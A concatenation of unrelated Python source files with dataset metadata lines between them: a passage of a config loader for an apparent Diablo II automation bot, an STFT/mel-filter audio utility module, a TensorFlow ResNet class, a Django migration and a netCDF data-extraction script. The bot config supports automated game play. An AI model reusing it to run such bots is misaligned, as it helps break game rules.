"tp"), "belt_rows": int(self._select_val("char", "belt_rows")), "show_belt": self._select_val("char", "show_belt"), "potion1": self._select_val("char", "potion1"), "potion2": self._select_val("char", "potion2"), "potion3": self._select_val("char", "potion3"), "potion4": self._select_val("char", "potion4"), "belt_rejuv_columns": int(self._select_val("char", "belt_rejuv_columns")), "belt_hp_columns": int(self._select_val("char", "belt_hp_columns")), "belt_mp_columns": int(self._select_val("char", "belt_mp_columns")), "stash_gold": bool(int(self._select_val("char", "stash_gold"))), "gold_trav_only": bool(int(self._select_val("char", "gold_trav_only"))), "use_merc": bool(int(self._select_val("char", "use_merc"))), "pre_buff_every_run": bool(int(self._select_val("char", "pre_buff_every_run"))), "cta_available": bool(int(self._select_val("char", "cta_available"))), "weapon_switch": self._select_val("char", "weapon_switch"), "battle_orders": self._select_val("char", "battle_orders"), "battle_command": self._select_val("char", "battle_command"), "casting_frames": int(self._select_val("char", "casting_frames")), "atk_len_trav": float(self._select_val("char", "atk_len_trav")), "atk_len_pindle": float(self._select_val("char", "atk_len_pindle")), "atk_len_eldritch": float(self._select_val("char", "atk_len_eldritch")), "atk_len_shenk": float(self._select_val("char", "atk_len_shenk")), "atk_len_nihlatak": float(self._select_val("char", "atk_len_nihlatak")), "hork_time_pindle": float(self._select_val("char", "hork_time_pindle")), "hork_time_eldritch": float(self._select_val("char", "hork_time_eldritch")), "hork_time_shenk": float(self._select_val("char", "hork_time_shenk")), "hork_time_council": float(self._select_val("char", "hork_time_council")), "hork_time_nihlatak": float(self._select_val("char", "hork_time_nihlatak")), } self.sorceress = dict(self._config["sorceress"]) if "sorceress" in self._custom: self.sorceress.update(dict(self._custom["sorceress"])) self.hammerdin = self._config["hammerdin"] if "hammerdin" in self._custom: self.hammerdin.update(self._custom["hammerdin"]) self.trapsin = self._config["trapsin"] if "trapsin" in self._custom: self.trapsin.update(self._custom["trapsin"]) self.barbarian = self._config["barbarian"] if "barbarian" in self._custom: self.barbarian.update(self._custom["barbarian"]) self.advanced_options = { "pathing_delay_factor": min(max(int(self._select_val("advanced_options", "pathing_delay_factor")), 1), 10), "message_headers": self._select_val("advanced_options", "message_headers"), "message_body_template": self._select_val("advanced_options", "message_body_template"), "message_highlight": bool(int(self._select_val("advanced_options", "message_highlight"))), } self.items = {} for key in self._pickit_config["items"]: self.items[key] = int(self._select_val("items", key)) if self.items[key] and not os.path.exists(f"./assets/items/{key}.png") and self._print_warnings: print(f"Warning: You activated {key} in pickit, but there is no img available in assets/items") self.colors = {} for key in self._game_config["colors"]: self.colors[key] = np.split(np.array([int(x) for x in self._select_val("colors", key).split(",")]), 2) self.ui_pos = {} for key in self._game_config["ui_pos"]: self.ui_pos[key] = int(self._select_val("ui_pos", key)) self.ui_roi = {} for key in self._game_config["ui_roi"]: self.ui_roi[key] = np.array([int(x) for x in self._select_val("ui_roi", key).split(",")]) self.path = {} for key in self._game_config["path"]: self.path[key] = np.reshape(np.array([int(x) 
for x in self._select_val("path", key).split(",")]), (-1, 2)) self.shop = { "shop_trap_claws": bool(int(self._select_val("claws", "shop_trap_claws"))), "shop_melee_claws": bool(int(self._select_val("claws", "shop_melee_claws"))), "shop_3_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_3_skills_ias_gloves"))), "shop_2_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_2_skills_ias_gloves"))), "trap_min_score": int(self._select_val("claws", "trap_min_score")), "melee_min_score": int(self._select_val("claws", "melee_min_score")), } if __name__ == "__main__": config = Config(print_warnings=True) # Check if any added items miss templates for k in config.items: if not os.path.exists(f"./assets/items/{k}.png"): print(f"Template not found: {k}") # Check if any item templates miss a config for filename in os.listdir(f'assets/items'): filename = filename.lower() if filename.endswith('.png'): item_name = filename[:-4] blacklist_item = item_name.startswith("bl__") if item_name not in config.items and not blacklist_item: print(f"Config not found for: " + filename)
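The pickit section above validates config entries against template images in both directions: every enabled item needs a template, and every template needs a config entry. As a standalone illustration, here is a minimal sketch of that two-way check; the `enabled` dict and `asset_dir` below are hypothetical stand-ins for the parsed config and the real assets folder.

import os

# Hypothetical stand-ins for the parsed pickit config and the asset directory.
enabled = {"ring_soj": 1, "rune_ber": 0}
asset_dir = "./assets/items"

# Direction 1: every enabled item needs a template image on disk.
for name, active in enabled.items():
    if active and not os.path.exists(os.path.join(asset_dir, f"{name}.png")):
        print(f"Warning: {name} is enabled but has no template image")

# Direction 2: every template image (except bl__ blacklist entries) needs a config entry.
if os.path.isdir(asset_dir):
    for filename in os.listdir(asset_dir):
        stem = filename.lower()
        if stem.endswith(".png"):
            item = stem[:-4]
            if item not in enabled and not item.startswith("bl__"):
                print(f"Config not found for: {filename}")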
55.45
164
0.616772
9,260
0.927763
0
0
0
0
0
0
3,590
0.359683
4c50b18cade6c81fd3dffac9c31804d4407603cf
19,446
py
Python
aps/transform/utils.py
haoxiangsnr/aps
38f77139b54553b0cb04b26a833bebbbf3177c5e
[ "Apache-2.0" ]
2
2021-06-17T20:29:02.000Z
2021-09-18T01:56:36.000Z
aps/transform/utils.py
haoxiangsnr/aps
38f77139b54553b0cb04b26a833bebbbf3177c5e
[ "Apache-2.0" ]
null
null
null
aps/transform/utils.py
haoxiangsnr/aps
38f77139b54553b0cb04b26a833bebbbf3177c5e
[ "Apache-2.0" ]
null
null
null
# Copyright 2019 Jian Wu # License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) import math import numpy as np import torch as th import torch.nn as nn import torch.nn.functional as tf import librosa.filters as filters from aps.const import EPSILON from typing import Optional, Union, Tuple def init_window(wnd: str, frame_len: int) -> th.Tensor: """ Return window coefficient Args: wnd: window name frame_len: length of the frame """ def sqrthann(frame_len, periodic=True): return th.hann_window(frame_len, periodic=periodic)**0.5 if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]: raise RuntimeError(f"Unknown window type: {wnd}") wnd_tpl = { "sqrthann": sqrthann, "hann": th.hann_window, "hamm": th.hamming_window, "blackman": th.blackman_window, "bartlett": th.bartlett_window, "rect": th.ones } if wnd != "rect": # match with librosa c = wnd_tpl[wnd](frame_len, periodic=True) else: c = wnd_tpl[wnd](frame_len) return c def init_kernel(frame_len: int, frame_hop: int, window: str, round_pow_of_two: bool = True, normalized: bool = False, inverse: bool = False, mode: str = "librosa") -> th.Tensor: """ Return STFT kernels Args: frame_len: length of the frame frame_hop: hop size between frames window: window name round_pow_of_two: if true, choose round(#power_of_two) as the FFT size normalized: return normalized DFT matrix inverse: return iDFT matrix mode: framing mode (librosa or kaldi) """ if mode not in ["librosa", "kaldi"]: raise ValueError(f"Unsupported mode: {mode}") # FFT points B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len # center padding window if needed if mode == "librosa" and B != frame_len: lpad = (B - frame_len) // 2 window = tf.pad(window, (lpad, B - frame_len - lpad)) if normalized: # make K^H * K = I S = B**0.5 else: S = 1 I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1) # W x B x 2 K = th.fft(I / S, 1) if mode == "kaldi": K = K[:frame_len] if inverse and not normalized: # to make K^H * K = I K = K / B # 2 x B x W K = th.transpose(K, 0, 2) * window # 2B x 1 x W K = th.reshape(K, (B * 2, 1, K.shape[-1])) return K, window def mel_filter(frame_len: int, round_pow_of_two: bool = True, num_bins: Optional[int] = None, sr: int = 16000, num_mels: int = 80, fmin: float = 0.0, fmax: Optional[float] = None, norm: bool = False) -> th.Tensor: """ Return mel filter coefficients Args: frame_len: length of the frame round_pow_of_two: if true, choose round(#power_of_two) as the FFT size num_bins: number of the frequency bins produced by STFT num_mels: number of the mel bands fmin: lowest frequency (in Hz) fmax: highest frequency (in Hz) norm: normalize the mel filter coefficients """ # FFT points if num_bins is None: N = 2**math.ceil( math.log2(frame_len)) if round_pow_of_two else frame_len else: N = (num_bins - 1) * 2 # fmin & fmax freq_upper = sr // 2 if fmax is None: fmax = freq_upper else: fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper) fmin = max(0, fmin) # mel filter coefficients mel = filters.mel(sr, N, n_mels=num_mels, fmax=fmax, fmin=fmin, htk=True, norm="slaney" if norm else None) # num_mels x (N // 2 + 1) return th.tensor(mel, dtype=th.float32) def speed_perturb_filter(src_sr: int, dst_sr: int, cutoff_ratio: float = 0.95, num_zeros: int = 64) -> th.Tensor: """ Return speed perturb filters, reference: https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py Args: src_sr: sample rate of the source signal dst_sr: sample rate of the target signal Return: weight (Tensor): coefficients of the filter 
""" if src_sr == dst_sr: raise ValueError( f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}") gcd = math.gcd(src_sr, dst_sr) src_sr = src_sr // gcd dst_sr = dst_sr // gcd if src_sr == 1 or dst_sr == 1: raise ValueError("do not support integer downsample/upsample") zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio padding = 1 + int(num_zeros / zeros_per_block) # dst_sr x src_sr x K times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) - np.arange(src_sr)[None, :, None] / float(src_sr) - np.arange(2 * padding + 1)[None, None, :] + padding) window = np.heaviside(1 - np.abs(times / padding), 0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi)) weight = np.sinc( times * zeros_per_block) * window * zeros_per_block / float(src_sr) return th.tensor(weight, dtype=th.float32) def splice_feature(feats: th.Tensor, lctx: int = 1, rctx: int = 1, subsampling_factor: int = 1, op: str = "cat") -> th.Tensor: """ Splice feature Args: feats (Tensor): N x ... x T x F, original feature lctx: left context rctx: right context subsampling_factor: subsampling factor op: operator on feature context Return: splice (Tensor): feature with context padded """ if lctx + rctx == 0: return feats if op not in ["cat", "stack"]: raise ValueError(f"Unknown op for feature splicing: {op}") # [N x ... x T x F, ...] ctx = [] T = feats.shape[-2] T = T - T % subsampling_factor for c in range(-lctx, rctx + 1): idx = th.arange(c, c + T, device=feats.device, dtype=th.int64) idx = th.clamp(idx, min=0, max=T - 1) ctx.append(th.index_select(feats, -2, idx)) if op == "cat": # N x ... x T x FD splice = th.cat(ctx, -1) else: # N x ... x T x F x D splice = th.stack(ctx, -1) return splice def _forward_stft( wav: th.Tensor, kernel: th.Tensor, output: str = "polar", pre_emphasis: float = 0, frame_hop: int = 256, onesided: bool = False, center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]: """ STFT inner function Args: wav (Tensor), N x (C) x S kernel (Tensor), STFT transform kernels, from init_kernel(...) 
output (str), output format: polar: return (magnitude, phase) pair complex: return (real, imag) pair real: return [real; imag] Tensor frame_hop: frame hop size in number samples pre_emphasis: factor of preemphasis onesided: return half FFT bins center: if true, we assumed to have centered frames Return: transform (Tensor or [Tensor, Tensor]), STFT transform results """ wav_dim = wav.dim() if output not in ["polar", "complex", "real"]: raise ValueError(f"Unknown output format: {output}") if wav_dim not in [2, 3]: raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D") # if N x S, reshape N x 1 x S # else: reshape NC x 1 x S N, S = wav.shape[0], wav.shape[-1] wav = wav.view(-1, 1, S) # NC x 1 x S+2P if center: pad = kernel.shape[-1] // 2 # NOTE: match with librosa wav = tf.pad(wav, (pad, pad), mode="reflect") # STFT if pre_emphasis > 0: # NC x W x T frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]), stride=frame_hop, padding=0) frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1] # 1 x 2B x W, NC x W x T, NC x 2B x T packed = th.matmul(kernel[:, 0][None, ...], frames) else: packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0) # NC x 2B x T => N x C x 2B x T if wav_dim == 3: packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1]) # N x (C) x B x T real, imag = th.chunk(packed, 2, dim=-2) # N x (C) x B/2+1 x T if onesided: num_bins = kernel.shape[0] // 4 + 1 real = real[..., :num_bins, :] imag = imag[..., :num_bins, :] if output == "complex": return (real, imag) elif output == "real": return th.stack([real, imag], dim=-1) else: mag = (real**2 + imag**2 + EPSILON)**0.5 pha = th.atan2(imag, real) return (mag, pha) def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]], kernel: th.Tensor, window: th.Tensor, input: str = "polar", frame_hop: int = 256, onesided: bool = False, center: bool = False) -> th.Tensor: """ iSTFT inner function Args: transform (Tensor or [Tensor, Tensor]), STFT transform results kernel (Tensor), STFT transform kernels, from init_kernel(...) 
input (str), input format: polar: return (magnitude, phase) pair complex: return (real, imag) pair real: return [real; imag] Tensor frame_hop: frame hop size in number samples onesided: return half FFT bins center: used in _forward_stft Return: wav (Tensor), N x S """ if input not in ["polar", "complex", "real"]: raise ValueError(f"Unknown output format: {input}") if input == "real": real, imag = transform[..., 0], transform[..., 1] elif input == "polar": real = transform[0] * th.cos(transform[1]) imag = transform[0] * th.sin(transform[1]) else: real, imag = transform # (N) x F x T imag_dim = imag.dim() if imag_dim not in [2, 3]: raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D") # if F x T, reshape 1 x F x T if imag_dim == 2: real = th.unsqueeze(real, 0) imag = th.unsqueeze(imag, 0) if onesided: # [self.num_bins - 2, ..., 1] reverse = range(kernel.shape[0] // 4 - 1, 0, -1) # extend matrix: N x B x T real = th.cat([real, real[:, reverse]], 1) imag = th.cat([imag, -imag[:, reverse]], 1) # pack: N x 2B x T packed = th.cat([real, imag], dim=1) # N x 1 x T s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0) # normalized audio samples # refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171 # 1 x W x T win = th.repeat_interleave(window[None, ..., None], packed.shape[-1], dim=-1) # W x 1 x W I = th.eye(window.shape[0], device=win.device)[:, None] # 1 x 1 x T norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0) if center: pad = kernel.shape[-1] // 2 s = s[..., pad:-pad] norm = norm[..., pad:-pad] s = s / (norm + EPSILON) # N x S s = s.squeeze(1) return s def forward_stft( wav: th.Tensor, frame_len: int, frame_hop: int, output: str = "complex", window: str = "sqrthann", round_pow_of_two: bool = True, pre_emphasis: float = 0, normalized: bool = False, onesided: bool = True, center: bool = False, mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]: """ STFT function implementation, equals to STFT layer Args: wav: source audio signal frame_len: length of the frame frame_hop: hop size between frames output: output type (complex, real, polar) window: window name center: center flag (similar with that in librosa.stft) round_pow_of_two: if true, choose round(#power_of_two) as the FFT size pre_emphasis: factor of preemphasis normalized: use normalized DFT kernel onesided: output onesided STFT inverse: using iDFT kernel (for iSTFT) mode: "kaldi"|"librosa", slight difference on applying window function """ K, _ = init_kernel(frame_len, frame_hop, init_window(window, frame_len), round_pow_of_two=round_pow_of_two, normalized=normalized, inverse=False, mode=mode) return _forward_stft(wav, K.to(wav.device), output=output, frame_hop=frame_hop, pre_emphasis=pre_emphasis, onesided=onesided, center=center) def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]], frame_len: int, frame_hop: int, input: str = "complex", window: str = "sqrthann", round_pow_of_two: bool = True, normalized: bool = False, onesided: bool = True, center: bool = False, mode: str = "librosa") -> th.Tensor: """ iSTFT function implementation, equals to iSTFT layer Args: transform: results of STFT frame_len: length of the frame frame_hop: hop size between frames input: input format (complex, real, polar) window: window name center: center flag (similar with that in librosa.stft) round_pow_of_two: if true, choose round(#power_of_two) as the FFT size normalized: use normalized DFT kernel onesided: output 
onesided STFT mode: "kaldi"|"librosa", slight difference on applying window function """ if isinstance(transform, th.Tensor): device = transform.device else: device = transform[0].device K, w = init_kernel(frame_len, frame_hop, init_window(window, frame_len), round_pow_of_two=round_pow_of_two, normalized=normalized, inverse=True, mode=mode) return _inverse_stft(transform, K.to(device), w.to(device), input=input, frame_hop=frame_hop, onesided=onesided, center=center) class STFTBase(nn.Module): """ Base layer for (i)STFT Args: frame_len: length of the frame frame_hop: hop size between frames window: window name center: center flag (similar with that in librosa.stft) round_pow_of_two: if true, choose round(#power_of_two) as the FFT size normalized: use normalized DFT kernel pre_emphasis: factor of preemphasis mode: "kaldi"|"librosa", slight difference on applying window function onesided: output onesided STFT inverse: using iDFT kernel (for iSTFT) """ def __init__(self, frame_len: int, frame_hop: int, window: str = "sqrthann", round_pow_of_two: bool = True, normalized: bool = False, pre_emphasis: float = 0, onesided: bool = True, inverse: bool = False, center: bool = False, mode="librosa") -> None: super(STFTBase, self).__init__() K, w = init_kernel(frame_len, frame_hop, init_window(window, frame_len), round_pow_of_two=round_pow_of_two, normalized=normalized, inverse=inverse, mode=mode) self.K = nn.Parameter(K, requires_grad=False) self.w = nn.Parameter(w, requires_grad=False) self.frame_len = frame_len self.frame_hop = frame_hop self.onesided = onesided self.pre_emphasis = pre_emphasis self.center = center self.mode = mode self.num_bins = self.K.shape[0] // 4 + 1 self.expr = ( f"window={window}, stride={frame_hop}, onesided={onesided}, " + f"pre_emphasis={self.pre_emphasis}, normalized={normalized}, " + f"center={self.center}, mode={self.mode}, " + f"kernel_size={self.num_bins}x{self.K.shape[2]}") def num_frames(self, wav_len: th.Tensor) -> th.Tensor: """ Compute number of the frames """ if th.sum(wav_len <= self.frame_len): raise RuntimeError( f"Audio samples less than frame_len ({self.frame_len})") kernel_size = self.K.shape[-1] if self.center: wav_len += kernel_size return (wav_len - kernel_size) // self.frame_hop + 1 def extra_repr(self) -> str: return self.expr class STFT(STFTBase): """ Short-time Fourier Transform as a Layer """ def __init__(self, *args, **kwargs): super(STFT, self).__init__(*args, inverse=False, **kwargs) def forward( self, wav: th.Tensor, output: str = "polar" ) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]: """ Accept (single or multiple channel) raw waveform and output magnitude and phase Args wav (Tensor) input signal, N x (C) x S Return transform (Tensor or [Tensor, Tensor]), N x (C) x F x T """ return _forward_stft(wav, self.K, output=output, frame_hop=self.frame_hop, pre_emphasis=self.pre_emphasis, onesided=self.onesided, center=self.center) class iSTFT(STFTBase): """ Inverse Short-time Fourier Transform as a Layer """ def __init__(self, *args, **kwargs): super(iSTFT, self).__init__(*args, inverse=True, **kwargs) def forward(self, transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]], input: str = "polar") -> th.Tensor: """ Accept phase & magnitude and output raw waveform Args transform (Tensor or [Tensor, Tensor]), STFT output Return s (Tensor), N x S """ return _inverse_stft(transform, self.K, self.w, input=input, frame_hop=self.frame_hop, onesided=self.onesided, center=self.center)
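Since `forward_stft` and `inverse_stft` build their kernels the same way, an analysis/synthesis round trip is a quick sanity check of this module. A minimal sketch, assuming an older PyTorch (pre-1.8) where `th.fft` with this signature still exists:

import torch as th
from aps.transform.utils import forward_stft, inverse_stft

wav = th.randn(2, 16000)  # N x S batch of dummy waveforms
# Analysis: 400-sample window / 160-sample hop at 16 kHz, complex output
real, imag = forward_stft(wav, 400, 160, output="complex", center=True)
# Synthesis with the matching settings
recon = inverse_stft((real, imag), 400, 160, input="complex", center=True)
# The reconstruction should match up to numerical error at the edges
print((wav - recon).abs().max())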
34.849462
121
0.538671
4,325
0.222411
0
0
0
0
0
0
6,964
0.35812
4c517119112a50b7dbf0616dc32615e3180ecafa
3,427
py
Python
applications/tensorflow/cnns/models/resnet.py
xihuaiwen/chinese_bert
631afbc76c40b0ac033be2186e717885246f446c
[ "MIT" ]
null
null
null
applications/tensorflow/cnns/models/resnet.py
xihuaiwen/chinese_bert
631afbc76c40b0ac033be2186e717885246f446c
[ "MIT" ]
null
null
null
applications/tensorflow/cnns/models/resnet.py
xihuaiwen/chinese_bert
631afbc76c40b0ac033be2186e717885246f446c
[ "MIT" ]
null
null
null
# Copyright 2019 Graphcore Ltd. from models.resnet_base import ResNet import tensorflow.compat.v1 as tf import tensorflow.contrib as contrib from tensorflow.python.ipu import normalization_ops # This is all written for: NHWC class TensorflowResNet(ResNet): def __init__(self, *args, **kwargs): self.dtype = tf.float16 super(TensorflowResNet, self).__init__(*args, **kwargs) def _get_variable(self, name, shape, init): return tf.get_variable(name, shape, initializer=init, dtype=self.dtype) def residual(self, x, shortcut, out_filters, stride, type='B'): in_shape = shortcut.get_shape() pad = int(x.get_shape()[3] - in_shape[3]) if pad != 0 or type == 'C': if type == 'A': shortcut = tf.strided_slice(shortcut, [0, 0, 0, 0], in_shape, strides=[1, stride, stride, 1]) shortcut = tf.pad(shortcut, paddings=[[0, 0], [0, 0], [0, 0], [0, pad]]) else: shortcut = self.conv(shortcut, 1, stride, out_filters) shortcut = self.norm(shortcut) x = shortcut + x x = self.relu(x) return x def relu(self, x): return tf.nn.relu(x) def conv(self, x, ksize, stride, filters_out, bias=True): filters_in = x.get_shape()[-1] wshape = [ksize, ksize, filters_in, filters_out] w_init = contrib.layers.xavier_initializer(dtype=self.dtype) weights = self._get_variable('weights', shape=wshape, init=w_init) x = tf.nn.conv2d(x, weights, [1, stride, stride, 1], padding='SAME') if bias: bshape = [filters_out] b_init = tf.zeros_initializer() biases = self._get_variable('biases', shape=bshape, init=b_init) x = x + biases return x def norm(self, x, type='BATCH', groups=32, training=False): if type == 'BATCH': # Perhaps use tf.nn.fused_batch_norm instead. x = tf.layers.batch_normalization(x, fused=True, center=True, scale=True, training=training, trainable=training, momentum=0.997, epsilon=1e-5) elif type == 'GROUP': x = normalization_ops.group_norm(x, groups=groups, center=True, scale=True, training=training, trainable=training, channels_axis=-1, reduction_axes=[-3, -2]) return x def fc(self, x, num_units_out): num_units_in = x.get_shape()[1] w_init = contrib.layers.xavier_initializer(dtype=self.dtype) b_init = tf.constant_initializer(0.0) with self.namescope('fc'): weights = self._get_variable('weights', shape=[num_units_in, num_units_out], init=w_init) biases = self._get_variable('biases', shape=[num_units_out], init=b_init) x = tf.nn.xw_plus_b(x, weights, biases) return x def reduce_mean(self, x, indices=(1, 2)): x = tf.reduce_mean(x, reduction_indices=indices) return x def maxpool(self, x): x = tf.nn.max_pool( x, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME') return x def namescope(self, debug_string): return tf.variable_scope(debug_string)
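The type-'A' branch of `residual` above emulates a strided shortcut by slicing the input and then zero-padding the channel axis up to the residual branch's width. A small NumPy sketch of just that shortcut transformation (NHWC layout, hypothetical shapes):

import numpy as np

# Hypothetical NHWC shortcut: batch 1, 8x8 spatial, 16 channels
shortcut = np.random.rand(1, 8, 8, 16).astype(np.float32)
stride, out_filters = 2, 32

# The strided slice halves the spatial dims (like tf.strided_slice with stride on H/W)
sliced = shortcut[:, ::stride, ::stride, :]                  # -> (1, 4, 4, 16)
# Zero-pad the channel axis up to the residual branch's filter count
pad = out_filters - sliced.shape[-1]
padded = np.pad(sliced, [(0, 0), (0, 0), (0, 0), (0, pad)])  # -> (1, 4, 4, 32)
print(padded.shape)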
38.505618
101
0.569594
3,197
0.932886
0
0
0
0
0
0
187
0.054567
4c545b9b4e257d67ea1869f9e75cf7e1b7bca4c8
613
py
Python
backend/app/migrations/0021_auto_20201205_1846.py
mareknowak98/AuctionPortal
0059fec07d51c6942b8af73cb8c4f9962c21fc97
[ "MIT" ]
null
null
null
backend/app/migrations/0021_auto_20201205_1846.py
mareknowak98/AuctionPortal
0059fec07d51c6942b8af73cb8c4f9962c21fc97
[ "MIT" ]
null
null
null
backend/app/migrations/0021_auto_20201205_1846.py
mareknowak98/AuctionPortal
0059fec07d51c6942b8af73cb8c4f9962c21fc97
[ "MIT" ]
null
null
null
# Generated by Django 3.1.4 on 2020-12-05 18:46 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app', '0020_auto_20201204_2324'), ] operations = [ migrations.AlterField( model_name='profile', name='profileBankAccountNr', field=models.CharField(blank=True, max_length=30, null=True), ), migrations.AlterField( model_name='profile', name='profileTelephoneNumber', field=models.CharField(blank=True, max_length=15, null=True), ), ]
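A minimal sketch of applying (or reverting) this migration through Django's management API, equivalent to running `manage.py migrate` from the shell; it assumes `DJANGO_SETTINGS_MODULE` points at the project settings:

import django
from django.core.management import call_command

django.setup()  # assumes DJANGO_SETTINGS_MODULE is configured
call_command("migrate", "app", "0021")
# Rolling back to the previous migration restores the altered field definitions:
# call_command("migrate", "app", "0020")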
25.541667
73
0.60522
520
0.848287
0
0
0
0
0
0
141
0.230016
4c551d5c25c26d348d1738fdb22529ee094e17ed
8,942
py
Python
rawcdf_extract.py
bedaro/ssm-analysis
09880dbfa5733d6301b84accc8f42a5ee320d698
[ "MIT" ]
null
null
null
rawcdf_extract.py
bedaro/ssm-analysis
09880dbfa5733d6301b84accc8f42a5ee320d698
[ "MIT" ]
null
null
null
rawcdf_extract.py
bedaro/ssm-analysis
09880dbfa5733d6301b84accc8f42a5ee320d698
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 import time import os import tempfile import shutil import logging from enum import Enum from argparse import ArgumentParser, Namespace, FileType from netCDF4 import Dataset, MFDataset import geopandas as gpd import numpy as np domain_nodes_shp = "gis/ssm domain nodes.shp" masked_nodes_txt = "gis/masked nodes.txt" logger = logging.getLogger(__name__) def get_node_ids(shps, masked): merged = None for i,shp in enumerate(shps): df = gpd.read_file(shp) df.set_index('node_id', inplace=True) logger.debug("Shapefile {0} has {1} nodes".format(shp, len(df))) if merged is None: merged = df.index else: merged = merged.union(df.index) logger.debug("get_node_ids found {0} nodes in {1} shapefiles".format( len(merged), len(shps))) masked_nodes = np.loadtxt(masked) merged = merged.difference(masked_nodes) logger.debug("{0} nodes left after masking".format(len(merged))) return merged.to_numpy() DEFAULT_SIGLAYERS = [-0.01581139, -0.06053274, -0.12687974, -0.20864949, -0.30326778, -0.40915567, -0.52520996, -0.65060186, -0.78467834, -0.9269075 ] def init_output(output_cdf, indata, nodes, **kwargs): args = Namespace(**kwargs) output = Dataset(output_cdf, "w") timeDim = output.createDimension('time', len(indata.dimensions['time'])) nodeDim = output.createDimension('node', len(nodes)) nodeVar = output.createVariable('node', "i4", ('node',)) output['node'][:] = nodes timeVar = output.createVariable('time', "f4", ('time',)) # Iterate over all output variables # If an extraction attribute is "all": # - add the 'siglay' dimension to the output if it's not already present # - include the 'siglay' dimension on the output variable # - add a 'zeta' output variable for var, attr in args.input_vars: if attr == InputAttr.ALL: siglayers = indata['siglay'][:] if 'siglay' in indata.variables else DEFAULT_SIGLAYERS output.createDimension('siglay', len(siglayers)) output.createVariable('siglay', 'f4', ('siglay',)) output['siglay'][:] = siglayers if 'zeta' in indata.variables: output.createVariable('zeta', 'f4', ('time','node')) break return output def append_output(output_cdf): return Dataset(output_cdf, 'a') def init_output_vars(output, **kwargs): args = Namespace(**kwargs) for var, attr in args.input_vars: out_name = args.outprefix + var if attr == InputAttr.BOTTOM: out_name += "_bottom" # TODO handle photic case dims = ('time','siglay','node') if attr == InputAttr.ALL else ('time','node') output.createVariable(out_name, 'f4', dims) # Gotten from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-or-iterable-into-evenly-sized-chunks def chunks(lst, n): """Yield successive n-sized chunks from lst.""" for i in range(0, len(lst), n): yield lst[i:i+n] class InputAttr(Enum): ALL = 0 BOTTOM = 1 # TODO add "photic" for the photic zone attr_strings = { "all": InputAttr.ALL, "bottom": InputAttr.BOTTOM } # Expands an input variable argument into a variable name and an attribute # describing the vertical extraction method. 
def colon_meta(string): var, attr = string.split(':', 2) return (var, attr_strings[attr]) def main(): script_home = os.path.dirname(os.path.realpath(__file__)) parser = ArgumentParser(description="Extract data from SSM netcdf output files") parser.add_argument("incdf", nargs="+", help="each input CDF file") parser.add_argument("outcdf", help="the output CDF file (created if it doesn't exist)") parser.add_argument("outprefix", help="a prefix for the extracted variables in the output CDF") parser.add_argument("-d", dest="domain_node_shapefiles", action="append", help="Specify a domain node shapefile") parser.add_argument("-m", dest="masked_nodes_file", type=FileType('r'), help="Specify a different masked nodes text file") parser.add_argument("--invar", dest="input_vars", type=colon_meta, action="append", help="Extract the values of a different output variable") parser.add_argument("-v", "--verbose", action="store_true", dest="verbose", help="Print progress messages during the extraction") parser.add_argument("-c", "--chunk-size", type=int, dest="chunk_size", help="Process this many CDF files at once") parser.add_argument("--cache", dest="cache", action="store_true", help="Use a read/write cache in a temporary directory") # Cannot include default values of lists here, see # https://bugs.python.org/issue16399 parser.set_defaults(chunk_size=4, verbose=False, masked_nodes_file=os.path.join(script_home, masked_nodes_txt)) args = parser.parse_args() # This is the workaround if not args.input_vars: args.input_vars = [("DOXG",InputAttr.BOTTOM)] if not args.domain_node_shapefiles: args.domain_node_shapefiles = [os.path.join(script_home, domain_nodes_shp)] logging.basicConfig(level=logging.INFO if args.verbose else logging.WARNING) #logger.setLevel(logging.DEBUG) if args.cache: with tempfile.TemporaryDirectory() as tmpdir: exist_cdfs = [] logger.info("Caching input files...") for infile in args.incdf: newpath = os.path.join(tmpdir, os.path.basename(infile)) shutil.copy(infile, newpath) exist_cdfs.append(newpath) output_cdf = os.path.join(tmpdir, os.path.basename(args.outcdf)) if os.path.exists(args.outcdf): logger.info("Caching output file...") shutil.copy(args.outcdf, output_cdf) do_extract(exist_cdfs, output_cdf, **vars(args)) # Copy the resulting output CDF back logger.info("Saving output file...") shutil.copy(output_cdf, args.outcdf) logger.info("Finished.") else: do_extract(args.incdf, args.outcdf, **vars(args)) def do_extract(exist_cdfs, output_cdf, **kwargs): args = Namespace(**kwargs) logger.info("Determining scope of work...") indata = MFDataset(exist_cdfs) if len(exist_cdfs) > 1 else Dataset(exist_cdfs[0]) node_ids = get_node_ids(args.domain_node_shapefiles, args.masked_nodes_file) logger.info("Initializing output file...") if not os.path.exists(output_cdf): outdata = init_output(output_cdf, indata, node_ids, **vars(args)) outdata['time'][:] = indata['time'][:] / 3600 / 24 else: outdata = append_output(output_cdf) init_output_vars(outdata, **vars(args)) # Attempts to use the entire MFDataset don't seem to scale well. 
